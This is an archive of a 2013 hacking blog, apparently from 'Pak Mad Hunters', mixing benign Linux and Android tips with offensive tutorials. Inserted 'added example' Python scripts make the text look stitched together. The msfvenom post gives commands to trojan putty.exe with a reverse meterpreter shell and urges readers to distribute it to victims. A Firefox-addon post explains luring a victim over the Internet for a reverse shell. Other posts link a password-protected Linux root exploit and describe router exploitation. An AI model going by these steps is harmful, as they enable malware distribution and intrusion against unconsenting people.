Saturday, 31 August 2013

How To Anonymize OS And Browser Details Using User-Agent Spoofing

What Is User-Agent?:
The User-Agent header is often used for content negotiation, where the origin server selects suitable content or operating parameters for its response based on the client's request. For example, a server may use a visitor's User-Agent string to deliver content compatible with the client's OS or browser.
User-Agent information is sent to the server in the HTTP headers, and it tells the server a lot about the client's OS and browser version.

User-Agent String Format For Browsers:
Most web browsers use a User-Agent value of the following form:

Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions].  

For example, Safari on the iPad has used the following:
 
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405

The components of this string are as follows:

  • Mozilla/5.0: Previously used to indicate compatibility with the Mozilla rendering engine
  • (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us): Details of the system in which the browser is running
  • AppleWebKit/531.21.10: The platform the browser uses
  • (KHTML, like Gecko): Browser platform details
  • Mobile/7B405: This is used by the browser to indicate specific enhancements that are available directly in the browser or through third parties. An example of this is Microsoft Live Meeting, which registers an extension so that the Live Meeting service knows whether the software is already installed and can provide a streamlined experience for joining meetings.

Format For Automated Agents (Bots):
Automated web crawling tools can use a simplified form, in which an important field is contact information in case of problems. By convention, the word "bot" is included in the agent's name. For example:
Googlebot/2.1 (+http://www.google.com/bot.html)
How Websites Detect A Visitor's OS And Browser:
As the browser user-agent format above shows, OS and system information can be extracted from a visitor's user-agent string. Below you can see your own OS and browser information as detected from your user-agent string.
Note: This detection is simple, so Android will be shown as Unix.
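To make concrete what a server actually has to work with, here is an added example (my code, not from the post) that splits a User-Agent string into the product tokens and parenthesised comments described above, flags the "bot" naming convention, and applies the kind of simple substring OS detection the note refers to. Only the iPad string is the one quoted above; the Android and bot strings are constructed samples.

```python
"""Added example (not from the original post): parse a User-Agent string into
the components the post describes and apply the simple OS detection it warns
about. Everything parsed here comes from a client-controlled header."""

SAMPLE_AGENTS = {
    # Quoted in the post above.
    "ipad_safari": "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) "
                   "AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405",
    # Constructed: typical shape of an Android browser string.
    "android": "Mozilla/5.0 (Linux; Android 4.3; Nexus 7 Build/JSS15Q) "
               "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.72 Safari/537.36",
    # Bot form quoted in the post: name/version plus a contact URL comment.
    "googlebot": "Googlebot/2.1 (+http://www.google.com/bot.html)",
}


def tokenize(ua):
    """Split a User-Agent value into ("product", name, version) and
    ("comment", text) items in order of appearance. Products are
    whitespace-delimited name/version tokens; comments are parenthesised."""
    items, i, n = [], 0, len(ua)
    while i < n:
        if ua[i].isspace():
            i += 1
        elif ua[i] == "(":
            j = ua.find(")", i)
            if j == -1:          # unterminated comment: take the rest
                j = n
            items.append(("comment", ua[i + 1:j].strip()))
            i = j + 1
        else:
            j = i
            while j < n and not ua[j].isspace() and ua[j] != "(":
                j += 1
            name, _, version = ua[i:j].partition("/")
            items.append(("product", name, version))
            i = j
    return items


def guess_os(comments):
    """The simple substring rule the post's detector uses. Android browsers put
    'Linux' in the system comment, so this rule reports them as Unix, which is
    exactly the caveat the post notes. (iPad strings say 'like Mac OS X', so
    this naive rule reports them as Mac OS X.)"""
    system = " ".join(comments)
    if "Windows" in system:
        return "Windows"
    if "Mac OS X" in system or "Macintosh" in system:
        return "Mac OS X"
    if "Linux" in system or "X11" in system:
        return "Unix"
    return "Unknown"


def parse_user_agent(ua):
    """Return the products (name/version), the parenthesised comments, the
    bot flag from the naming convention, and the naive OS guess."""
    products, comments = [], []
    for item in tokenize(ua):
        if item[0] == "product":
            products.append({"name": item[1], "version": item[2]})
        else:
            comments.append(item[1])
    return {
        "products": products,
        "comments": comments,
        "is_bot": any("bot" in p["name"].lower() for p in products),
        "os": guess_os(comments),
    }


if __name__ == "__main__":
    for label, ua in SAMPLE_AGENTS.items():
        info = parse_user_agent(ua)
        print(f"{label}: os={info['os']} bot={info['is_bot']} "
              f"products={[p['name'] for p in info['products']]}")
```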


Countermeasures:
So how can we fool such a site and feed it bogus information? This can be done with user-agent spoofing.

User-Agent Spoofing:
User-agent spoofing is a technique in which we replace our browser's user-agent string with the user-agent string of some other browser or bot. In this tutorial, I will show the user-agent spoofing method for Mozilla Firefox and Google Chrome. So let's start.

User-Agent Spoofing In Firefox:
To do user-agent spoofing in Firefox, we will use an addon named User Agent Switcher.

Click here to install User Agent Switcher in your Firefox.

Now everything is ready, so we only need a user-agent string to replace our current one. You can get the user-agent string of any browser from here.
1- Copy the user-agent string of any browser and open the User Agent Switcher addon in Firefox.
2- Click on "Edit User Agents..", then click on "New", which opens a drop-down menu; there click on "New User Agent".
3- Click in the User Agent text field and replace the string with our new user-agent string.
4- Add a description so you remember which user-agent string it is, and click OK.
5- The new user agent will appear in your User Agents dialog box. Click on it and click OK. Now we are using this new user agent.
6- To check whether the new user-agent is working, refresh your browser page and see whether my tutorial still detects your OS and browser.

User-Agent Spoofing In Google Chrome:
For Google Chrome users, a Chrome extension named User-Agent Switcher is available and can be installed from here.
Its interface is easy to use, so no further instructions are needed.
Select any user agent from the list, come to my site and check whether it still detects your OS and browser version. Thanks for reading this tutorial. If you have any trouble while following it, you may ask in the comments.

Friday, 30 August 2013

How To Integrate Kali Linux Tools In Your Favorite Ubuntu Distro


In this tutorial, I am using Ubuntu 13.04 Raring Ringtail for the Kali Linux tools integration. You can use any of the following Ubuntu releases:

Raring= 13.04
Quantal= 12.10
Precise= 12.04


These releases have been tested and work perfectly with the Kali Linux tools.

OK, let's do it. Follow me step by step.

1- Copy the following Kali Linux repository lines.

deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu YOUR_UBUNTU_VERSION main
deb-src http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu YOUR_UBUNTU_VERSION main
deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu YOUR_UBUNTU_VERSION main
deb-src http://ppa.launchpad.net/wagungs/kali-linux/ubuntu YOUR_UBUNTU_VERSION main

Note: Replace "YOUR_UBUNTU_VERSION" with your Ubuntu version's codename. For Ubuntu 13.04 the codename is raring, so all four lines become:

deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu raring main
deb-src http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu raring main
deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu raring main
deb-src http://ppa.launchpad.net/wagungs/kali-linux/ubuntu raring main


2- Open a terminal and open /etc/apt/sources.list in your favourite text editor. I am using nano in this tutorial; you may use gedit, vi, vim or any other editor.
sudo nano /etc/apt/sources.list
The nano editor will open the sources.list file. Paste these lines at the end of the file and press CTRL + X to save it.

3- Now copy the following PGP key and save it in a text file with any name, e.g. kali.pgp.


4- Now we need to add this PGP key to apt. Add it using the following command.
sudo apt-key add kali.pgp
On successful addition of the key, you will see OK printed.

5- Now update your apt package lists using the following command.
sudo apt-get update
6- Now you need a package manager to install all the Kali Linux tools at once. I am using Synaptic Package Manager in this tutorial. If you don't have it, install it using the following command.
sudo apt-get install synaptic
7- Open Synaptic Package Manager and click on the Origin button in the lower left pane. You will see two Kali Linux repositories with the following names.

LP-PPA-wagungs-kali-linux/raring
LP-PPA-wagungs-kali-linux2/raring

Click on the first repository and go to the right-hand pane where all the tools are shown. Press CTRL + A there to select all the tools.

8- Right-click and choose Mark for Installation. Now find the tools marked with a red "!". These packages with a red exclamation mark are broken packages which can't be installed right now; right-click on them and unmark them. Now do the same with the second repository (mark all tools). Then click the Apply button, which will begin the installation.

Wait for it to complete and enjoy the Kali Linux tools on your favourite Ubuntu release.
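The repository editing in steps 1, 2 and 5 can be scripted. Here is an added example (my code, not the post's) that generates the four PPA lines for one of the three tested codenames and merges them into sources.list text without duplicating lines on a second run; the key import is not automated here, and keep in mind that apt treats every package signed by an imported key as trusted.

```python
"""Added example (not from the post): build the four PPA lines for a tested
Ubuntu codename and merge them into sources.list text without duplicating
lines that are already there. Writing /etc/apt/sources.list and the apt-key
step still need root and are left to the steps above."""
import sys

PPA_BASE = "http://ppa.launchpad.net/wagungs"
# The codenames the post says were tested, mapped to their release numbers.
TESTED = {"raring": "13.04", "quantal": "12.10", "precise": "12.04"}


def kali_ppa_lines(codename):
    """Return the four deb/deb-src lines with YOUR_UBUNTU_VERSION filled in,
    in the post's order. Refuses codenames the post did not test."""
    if codename not in TESTED:
        raise ValueError(f"codename {codename!r} is not one of {sorted(TESTED)}")
    lines = []
    for repo in ("kali-linux2", "kali-linux"):
        lines.append(f"deb {PPA_BASE}/{repo}/ubuntu {codename} main")
        lines.append(f"deb-src {PPA_BASE}/{repo}/ubuntu {codename} main")
    return lines


def merge_sources(existing_text, lines):
    """Append only the lines not already present; return (new_text, added).
    Running it twice adds nothing the second time."""
    present = set(existing_text.splitlines())
    new = [line for line in lines if line not in present]
    text = existing_text
    if new:
        if text and not text.endswith("\n"):
            text += "\n"
        text += "\n".join(new) + "\n"
    return text, len(new)


if __name__ == "__main__":
    # Usage: python3 this.py raring [/path/to/sources.list]
    # Without a path it only prints the lines; with a path it rewrites the
    # file with the missing lines appended (needs sudo for /etc/apt/sources.list).
    codename = sys.argv[1] if len(sys.argv) > 1 else "raring"
    if len(sys.argv) > 2:
        path = sys.argv[2]
        try:
            current = open(path).read()
        except OSError:
            current = ""
        updated, added = merge_sources(current, kali_ppa_lines(codename))
        if added:
            with open(path, "w") as f:
                f.write(updated)
        print(f"{added} line(s) added to {path}")
    else:
        print("\n".join(kali_ppa_lines(codename)))
```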

Saturday, 24 August 2013

Anonymize Bluetooth Devices On Linux Using hciconfig Utility

On Linux we can enumerate and configure Bluetooth devices using a built-in utility called hciconfig.

You can get the complete manual of this utility by typing the following command in a terminal.

$man hciconfig

In this tutorial, I will mention only the most important commands, those that matter from a security point of view.

Display Basic Info About Available Bluetooth Devices:

exploiter@exploiter:~$ hciconfig
 

Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: E4:D5:3D:F2:7B:66  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:1105 acl:0 sco:0 events:38 errors:0
    TX bytes:2088 acl:0 sco:0 commands:38 errors:0

Output Explained:


In the above output, the BD Address field is important from an information-gathering perspective. This BD Address is used for scanning with hcitool; follow my upcoming tutorial on hcitool for a better understanding of BD Address usage. From this output, we can see that the device is UP and RUNNING and that PSCAN is enabled. Enabled PSCAN (Page Scan) means that Bluetooth devices in our surroundings can page-scan and find our Bluetooth device. RX and TX are the bytes received and sent, respectively, by our Bluetooth device hci0.

Display Info About A Specific Bluetooth Device:

exploiter@exploiter:~$ hciconfig -a hci0
 

Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:551 acl:0 sco:0 events:32 errors:0
    TX bytes:2070 acl:0 sco:0 commands:32 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
    Link policy: RSWITCH HOLD SNIFF PARK
    Link mode: SLAVE ACCEPT
    Name: 'ubuntu-0'
    Class: 0x6e0100
    Service Classes: Networking, Rendering, Capturing, Audio, Telephony
    Device Class: Computer, Uncategorized
    HCI Version: 3.0 (0x5)  Revision: 0x2f9
    LMP Version: 3.0 (0x5)  Subversion: 0x4203
    Manufacturer: Broadcom Corporation (15)

Output Explained:

 
hci0 is the Bluetooth device on our system. It may be any of hci0, hci1, etc. If you don't specify hciX in the command, it prints all info about all Bluetooth devices on the system. In this output the name of the Bluetooth device is shown; here our device is using the OS hostname as its own name. We will change this so that nobody can enumerate information about our Bluetooth device from it. Class is a 24-bit (6 hex digit) identifier for Bluetooth devices. The class defines which hardware class a Bluetooth device belongs to, e.g. 0x78020c is the class of a Phone/Smart phone, 0x6e0100 is the class of a computer, etc.
In this tutorial I will show you how to change your device name and class to fool other people or a Bluetooth scanner.


Display Features Of A Specific Bluetooth Device:

exploiter@exploiter:~$ hciconfig hci0 features

 
Output:


hci0:    Type: BR/EDR  Bus: USB
    BD Address: XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    Features page 0: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
        <3-slot packets> <5-slot packets> <encryption> <slot offset>
        <timing accuracy> <role switch> <hold mode> <sniff mode>
        <park state> <RSSI> <channel quality> <SCO link> <HV2 packets>
        <HV3 packets> <u-law log> <A-law log> <CVSD> <paging scheme>
        <power control> <transparent SCO> <broadcast encrypt>
        <EDR ACL 2 Mbps> <EDR ACL 3 Mbps> <enhanced iscan>
        <interlaced iscan> <interlaced pscan> <inquiry with RSSI>
        <extended SCO> <EV4 packets> <EV5 packets> <AFH cap. slave>
        <AFH class. slave> <3-slot EDR ACL> <5-slot EDR ACL>
        <sniff subrating> <pause encryption> <AFH cap. master>
        <AFH class. master> <EDR eSCO 2 Mbps> <EDR eSCO 3 Mbps>
        <3-slot EDR eSCO> <extended inquiry> <simple pairing>
        <encapsulated PDU> <err. data report> <non-flush flag> <LSTO>
        <inquiry TX power> <EPC> <extended features>
    Features page 1: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Output Explained:

 
In this output, all features supported by bluetooth device are shown.

Spoof Bluetooth Name And Class:

exploiter@exploiter:~$ sudo hciconfig hci0 name 'exploiter-z' class 0x78020c
exploiter@exploiter:~$ hciconfig -a hci0


Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:2505 acl:0 sco:0 events:60 errors:0
    TX bytes:3878 acl:0 sco:0 commands:57 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
    Link policy: RSWITCH HOLD SNIFF PARK
    Link mode: SLAVE ACCEPT
    Name: 'exploiter-z'
    Class: 0x78020c
    Service Classes: Capturing, Object Transfer, Audio, Telephony
    Device Class: Phone, Smart phone
    HCI Version: 3.0 (0x5)  Revision: 0x2f9
    LMP Version: 3.0 (0x5)  Subversion: 0x4203
    Manufacturer: Broadcom Corporation (15)

Output Explained:

You can see in the output that the name and hardware class of our Bluetooth device are spoofed. Now a scanner will consider us a smart phone.
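The class values used above (0x6e0100 for the laptop, 0x78020c for the spoofed phone) are worth decoding, since a scanner or a log parser on the other side interprets them the same way hciconfig does. Here is an added example (mine, not from the post or BlueZ) that decodes and builds Class of Device values from the bit layout in the Bluetooth Assigned Numbers; the minor-class tables cover only the Computer and Phone majors the post uses. Note that the BD Address shown by hciconfig is not changed by spoofing the name and class.

```python
"""Added example (not from the post): decode and build the 24-bit Bluetooth
Class of Device value that hciconfig prints as 'Class:'. Bit layout per the
Bluetooth Assigned Numbers: bits 0-1 format, bits 2-7 minor device class,
bits 8-12 major device class, bits 13-23 major service classes."""

# (bit, name) in the order hciconfig lists them.
SERVICE_CLASSES = [
    (13, "Limited Discoverable"), (16, "Positioning"), (17, "Networking"),
    (18, "Rendering"), (19, "Capturing"), (20, "Object Transfer"),
    (21, "Audio"), (22, "Telephony"), (23, "Information"),
]

MAJOR_CLASSES = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone",
    3: "LAN/Network Access Point", 4: "Audio/Video", 5: "Peripheral",
    6: "Imaging", 7: "Wearable", 8: "Toy", 9: "Health", 31: "Uncategorized",
}

# Minor classes for the two majors the post uses (Computer and Phone only).
MINOR_CLASSES = {
    1: {0: "Uncategorized", 1: "Desktop workstation", 2: "Server",
        3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm sized PC/PDA",
        6: "Wearable computer", 7: "Tablet"},
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smart phone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}


def decode_cod(cod):
    """Return the service classes, major class and minor class encoded in cod."""
    services = [name for bit, name in SERVICE_CLASSES if (cod >> bit) & 1]
    major_code = (cod >> 8) & 0x1F
    minor_code = (cod >> 2) & 0x3F
    major = MAJOR_CLASSES.get(major_code, f"Reserved (0x{major_code:02x})")
    minor = MINOR_CLASSES.get(major_code, {}).get(
        minor_code, f"Minor 0x{minor_code:02x}")
    return {"services": services, "major": major, "minor": minor}


def encode_cod(services, major_code, minor_code):
    """Build a Class of Device value from its parts; the inverse of decode_cod."""
    cod = ((major_code & 0x1F) << 8) | ((minor_code & 0x3F) << 2)
    for bit, name in SERVICE_CLASSES:
        if name in services:
            cod |= 1 << bit
    return cod


def describe_cod(cod):
    """Format like the 'Service Classes:' / 'Device Class:' lines of hciconfig -a."""
    d = decode_cod(cod)
    return (f"Class: 0x{cod:06x}\n"
            f"Service Classes: {', '.join(d['services'])}\n"
            f"Device Class: {d['major']}, {d['minor']}")


if __name__ == "__main__":
    # The two values from the post: the laptop's real class and the spoofed one.
    for cod in (0x6E0100, 0x78020C):
        print(describe_cod(cod))
```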

Disable PSCAN And ISCAN To Make Yourself Invisible To Bluetooth Devices:

exploiter@exploiter:~$ sudo hciconfig hci0 noscan
exploiter@exploiter:~$ hciconfig

 

Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING
    RX bytes:2788 acl:0 sco:0 events:64 errors:0
    TX bytes:3891 acl:0 sco:0 commands:61 errors:0

Output Explained:


In the first command, we gave the noscan parameter for the hci0 device. Checking the hci0 configuration afterwards, you can see the device is up and running but PSCAN is no longer enabled. Now you are invisible to Bluetooth devices.

UP, DOWN or RESET A Bluetooth Device:

exploiter@exploiter:~$ sudo hciconfig hci0 reset
exploiter@exploiter:~$ hciconfig hci0 -a


Output:

hci0:    Type: BR/EDR  Bus: USB
    BD Address: XX:XX:XX:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
    UP RUNNING PSCAN
    RX bytes:3401 acl:0 sco:0 events:101 errors:0
    TX bytes:4535 acl:0 sco:0 commands:98 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
    Link policy: RSWITCH HOLD SNIFF PARK
    Link mode: SLAVE ACCEPT
    Name: 'exploiter-z'
    Class: 0x6e0100
    Service Classes: Networking, Rendering, Capturing, Audio, Telephony
    Device Class: Computer, Uncategorized
    HCI Version: 3.0 (0x5)  Revision: 0x2f9
    LMP Version: 3.0 (0x5)  Subversion: 0x4203
    Manufacturer: Broadcom Corporation (15)

Output Explained:
 

You can see that our device's hardware class is back to Computer from Phone/Smart phone, and UP RUNNING PSCAN are back too. Our device has been reset.
Similarly, up or down can be used instead of reset to bring the device up or down.


Blacklist BD Address (MAC) Of A Device:

exploiter@exploiter:~$ sudo hciconfig hci0 block XX:XX:XX:XX:XX:XX

Now the device with BD Address/MAC address XX:XX:XX:XX:XX:XX will be blocked for hci0. To unblock this device, simply replace block with unblock.



Local Root Exploit For Linux Kernel 2.6.32 2012-2013


Download here
Zip Password: *pakmadhunters*

Note:
It's a pre-compiled exploit and has been verified on the servers listed. It might work on other 2.6.32-X kernels too, so test it and update us in the comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.


How To Take Screenshot Of Expanded Gnome Menu In Linux



When the Gnome menu is expanded, we can't take a screenshot just by pressing the PrntScn key on the keyboard, so we need another solution.
Here I describe two methods you can use to take a screenshot with the Gnome menu expanded.

First Method:

You can run gnome-screenshot on a timer. For example:

Command:
$gnome-panel-screenshot --delay 5
This command waits 5 seconds before capturing your desktop, which is enough time to open the Gnome menu.

Second Method:

In this method, you use the GIMP image editor.
To take a screenshot, open

File -> Create -> Screenshot

Choose "Take Screenshot of entire screen" and a suitable delay in seconds. GIMP will take the screenshot after that delay.


Friday, 16 August 2013

How To Backdoor Windows Executables Using Metasploit's Plugin Msfvenom


In this tutorial, I will show you how to backdoor Windows executables using the Metasploit Exploitation Framework's plugin Msfvenom.

For LAN/Wifi Networks:

Now follow me step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1- Open terminal and download putty using wget.

wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in the root directory when I ran the above command, so putty was downloaded into /root/.
Now use msfvenom to backdoor this executable with the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=4444 > evilputty.exe

The above command generates an EXE file named evilputty.exe. This is our backdoored executable.
3- Start metasploit.

msfconsole

4- Start Metasploit's reverse handler to receive the reverse connection.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit


5- Distribute this evilputty.exe in your LAN/Wifi network and wait for a victim. When the victim opens evilputty.exe, you will get a reverse shell on your Metasploit handler. Happy Hacking :)

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports.
Follow my tutorial below for a better understanding of how Metasploit works over the Internet.

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)

Author:
Captain & exploiter-z from Pak Mad Hunters

Sunday, 11 August 2013

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)


Metasploit has basically two types of exploits in its database: remote exploits and client-side attacks.
In this tutorial, I will show you how to use Metasploit's Firefox bootstrapped addon exploit over a WAN (wide area network), i.e. the Internet.

Requirements:
  • Router (With Port Forwarding Support)
  • Metasploit Framework
Exploit Title: Firefox Bootstrapped Addon

I will use TeamViewer to show you the remote machine's IP and activity status.

Attacker's Public IP: 182.186.248.2

Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victim's IP: X.X.X.X

Step 1:
Forward the following two ports to the attacker's internal IP, which is 192.168.1.7:
  1. the web server port, which is 8080 in my case; in Metasploit this is defined by the SRVPORT parameter
  2. the payload port, which is 7777 in my case; in Metasploit it is defined by the LPORT parameter
Step 2:
Now start msfconsole and use the following exploit:

use exploit/multi/browser/firefox_xpi_bootstrapped_addon


Use your public IP for the LHOST parameter, while all remaining parameters get the internal IP, like this:


set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 182.186.248.2
set lport 7777

Step 3:
Now send this server's address to the victim:
http://182.186.248.2:8080/

When the victim runs this addon after installing it, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)


If you have any trouble while following this tutorial, you may ask me in the comments.

Sunday, 4 August 2013

How To Provide Python Support For Android Using SL4A (Scripting Layer For Android)



Scripting Layer for Android (SL4A) brings scripting languages to Android by allowing you to edit and execute scripts and interactive interpreters directly on the Android device. These scripts have access to many of the APIs available to full-fledged Android applications, but with a greatly simplified interface that makes it easy to get things done.
Scripts can be run interactively in a terminal or in the background. Python, Perl, JRuby, Lua, BeanShell, JavaScript, Tcl, and shell are currently supported, and support for more languages will be added soon.

NOTE: For Rooted Devices Only

Requirements:
  • Rooted Android Device
  • Android Terminal Emulator
  • SL4A
  • PythonForAndroid 

Saturday, 3 August 2013

dSploit Network Penetration Suite For Android Platform


dSploit is an Android network analysis and penetration suite for performing network security assessments from an Android mobile device.
Once dSploit is started, you will be able to easily map your network, fingerprint the operating systems and running services of live hosts, search for known vulnerabilities, crack the logon procedures of many TCP protocols, perform man-in-the-middle attacks such as password sniffing (with dissection of common protocols), real-time traffic manipulation, etc.

This application is still in beta; a stable release will be available as soon as possible, but expect some crashes or strange behaviour until then. In any case, feel free to submit an issue on GitHub.

Download Link:  dSploit

ANmap Android Nmap Tool For Network Penetration Testing


Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. It is the most important enumeration tool of almost every hacker.
So far it has been available on Windows, Linux and Mac OS X, but now it is available on the Android platform too. It has been compiled from the real Nmap source code by some developers to provide support for Android devices.

Note:
This tool can't use its full power without root permissions, so try it on a ROOTED Android device.

GUI Download Link: anmap.apk

Connectbot Secure shell (SSH) And Telnet client for the Android Platform


ConnectBot is a Secure Shell client for the Android platform. Its ultimate goal is to create a secure connection through which you can use a shell on a remote machine and transfer files back and forth to your phone.

Installation:

The latest stable version of ConnectBot is available in the Android Market.
Google Play Download Link:  Connectbot

Development Version Installation Method:
If you want to run the development versions, you can follow these quick steps to get ConnectBot working on your G1 Android phone:
1. Enable applications from outside the Market. Go into Settings, Applications, and enable the "Unknown sources" option.

Top 5 Nmap Essential Commands That Every Penetration Tester Must Know


Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
It is the most important enumeration tool of almost every hacker. In this tutorial, I will demonstrate only the most important commands that every beginner needs to know.
Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Download:

Windows: users can download its GUI as well as command-line binaries. The graphical Nmap is called Zenmap. Both are available here.

Linux: users can install it from a terminal with the apt-get or yum package manager.
  • Debian Linux: sudo apt-get install nmap
  • RPM Linux: sudo yum install nmap
Mac OS X: users can download its standalone installer from here.

NOTE:
Always run Nmap with sudo on Linux, and as administrator on Windows, for better performance and results.

Friday, 2 August 2013

RouterPwn Router Exploitation Framework


Routerpwn is a web-application-based router exploitation framework that holds a collection of router exploits in a well categorized manner.
Routerpwn is written in JavaScript and HTML to provide multi-platform support to its users, and it has been optimized to run on mobile devices such as smartphones and tablets too.

Exploitation:
Most of the exploits are used from within the router's LAN, and a few don't need a network at all, like the EasyBox Standard WPA2 Key Generator exploit.

1- So, first of all, get onto the LAN of the router that you want to PWN.
2- Identify the router's IP by checking your IP configuration.
3- Now use nmap to identify which router it is, using the following command (X.X.X.X is the router's IP).
nmap -O -v X.X.X.X

Thursday, 1 August 2013

How To Differentiate Between Physical And Logical Hyper-Threaded Cores In Linux


Finding the number of CPU cores on a Linux server can be challenging. The way /proc/cpuinfo displays information makes it hard to distinguish between real CPU cores and logical hyper-threading CPUs.
For example, consider if I run the following command on my Linux laptop:

NOTE: The lines under each command show its output.
$ cat /proc/cpuinfo | grep processor
processor    : 0
processor    : 1
processor    : 2
processor    : 3
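The command above only counts logical processors. As an added example that goes beyond what the post shows (my code, not the author's), here is a parser that reads the physical id and core id fields of /proc/cpuinfo to separate sockets, physical cores and hyper-threads; the embedded sample is a constructed excerpt for a single two-core socket with hyper-threading enabled.

```python
"""Added example: separate physical cores from hyper-threads using the
'physical id' and 'core id' fields of /proc/cpuinfo. Each logical CPU is a
'processor' block; logical CPUs sharing (physical id, core id) are sibling
threads of one physical core."""
import os

# Constructed excerpt: one socket, two physical cores, hyper-threading on,
# so four processor blocks. Only the fields this example reads are included.
SAMPLE_CPUINFO = """\
processor\t: 0
physical id\t: 0
siblings\t: 4
core id\t: 0
cpu cores\t: 2

processor\t: 1
physical id\t: 0
siblings\t: 4
core id\t: 0
cpu cores\t: 2

processor\t: 2
physical id\t: 0
siblings\t: 4
core id\t: 1
cpu cores\t: 2

processor\t: 3
physical id\t: 0
siblings\t: 4
core id\t: 1
cpu cores\t: 2
"""


def parse_cpuinfo(text):
    """Return one dict per 'processor' block, keyed by field name."""
    cpus, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                cpus.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        cpus.append(current)
    return cpus


def core_topology(text):
    """Count sockets, physical cores and logical CPUs. Some VMs omit the
    'physical id'/'core id' fields; then each logical CPU is counted as its
    own core, which is the best /proc/cpuinfo alone can tell you."""
    cpus = parse_cpuinfo(text)
    sockets = {c.get("physical id", "0") for c in cpus}
    cores = {(c.get("physical id", "0"), c.get("core id", c["processor"]))
             for c in cpus}
    return {
        "sockets": len(sockets),
        "physical_cores": len(cores),
        "logical_cpus": len(cpus),
        "hyperthreading": len(cpus) > len(cores),
    }


if __name__ == "__main__":
    # Reads the real file when run on Linux, otherwise the constructed sample.
    path = "/proc/cpuinfo"
    text = open(path).read() if os.path.exists(path) else SAMPLE_CPUINFO
    print(core_topology(text))
```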

Vega Web Vulnerability Scanner For Windows/Linux/Mac (With Solution For Windows Installation Bugs)


Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: JavaScript.